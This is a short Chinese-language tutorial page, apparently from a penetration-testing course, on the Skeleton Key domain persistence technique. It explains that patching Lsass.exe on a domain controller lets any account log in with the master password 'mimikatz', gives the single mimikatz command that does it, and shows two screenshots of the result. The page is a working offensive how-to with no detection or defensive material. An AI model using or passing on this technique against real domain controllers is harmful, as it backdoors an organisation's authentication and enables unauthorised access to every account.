# 万能钥匙

万能钥匙 (Skeleton key) 是一种持久化技术，只适用于域控制器，通过补丁域控制器上的 **Lsass.exe** 进程以劫持 NTLM 和 Kerberos 认证流程，以允许任何用户以一个相同的密码 **mimikatz** 进行认证，当然用户原本的密码也依旧有效。

在域控制上运行mimikatz

```
mimikatz misc::skeleton
```

[![image.png](https://raven-medicine.com/uploads/images/gallery/2023-06/scaled-1680-/vGfwfFUNGvMdwM3f-image.png)](https://raven-medicine.com/uploads/images/gallery/2023-06/vGfwfFUNGvMdwM3f-image.png)

然后，我们可以用任何账户以及密码 **mimikatz** 进行认证了。

[![image.png](https://raven-medicine.com/uploads/images/gallery/2023-06/scaled-1680-/4NQXyBraj3cxEhEr-image.png)](https://raven-medicine.com/uploads/images/gallery/2023-06/4NQXyBraj3cxEhEr-image.png)